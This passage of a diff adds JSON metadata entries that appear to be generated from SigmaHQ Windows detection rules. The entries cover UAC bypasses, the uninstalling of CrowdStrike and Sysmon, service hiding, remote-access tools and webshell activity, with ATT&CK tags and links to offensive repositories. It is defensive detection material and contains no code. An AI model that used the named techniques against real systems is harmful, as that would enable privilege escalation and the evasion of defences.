63)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_uac_bypass_dismhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost" + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews" + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe" + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack" + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "meta": { + "author": "Florian Roth", + "creation_date": 
"2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil" + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + 
], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + 
"Unknown" + ], + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": 
"0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process" + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe" + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultraviewer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", + "value": "Use of UltraViewer Remote Access Software" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultravnc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "Uninstall by admin" + ], + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon" + }, + { + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uninstall_sysmon.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon" + }, + { + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe" + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user 
information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet" + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service 
Permissions" + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in Tools" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service" + }, + { + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_verclsid_runs_com.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object" + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence 
setup", + "meta": { + "author": "behops, Bhabesh Raj", + "creation_date": "2021/10/08", + "falsepositive": [ + "Legitimate use by administrator" + ], + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ] + }, + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process" + }, + { + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ] + }, + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging" + }, + { + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_w32tm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer" + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + "value": "Wab Execution From Non Default Location" + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_unusual_parents.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes" + }, + { + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" + ], + "filename": "proc_creation_win_weak_or_abused_passwords.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "value": "Weak or Abused Passwords In CLI" + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "meta": { + "author": "frack113", + 
"creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_webbrowserpassview.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable" + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "meta": { + "author": "Florian Roth (rule), MSTI (query)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_chopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern" + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "creation_date": "2017/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords" + }, + { + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_webshell_hacking.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/7aemGhaE9ds?t=641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "value": "Webshell Hacking Activity Patterns" + }, + { + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "meta": { + "author": "Cian Heasley, Florian Roth", + "creation_date": "2020/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_recon_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
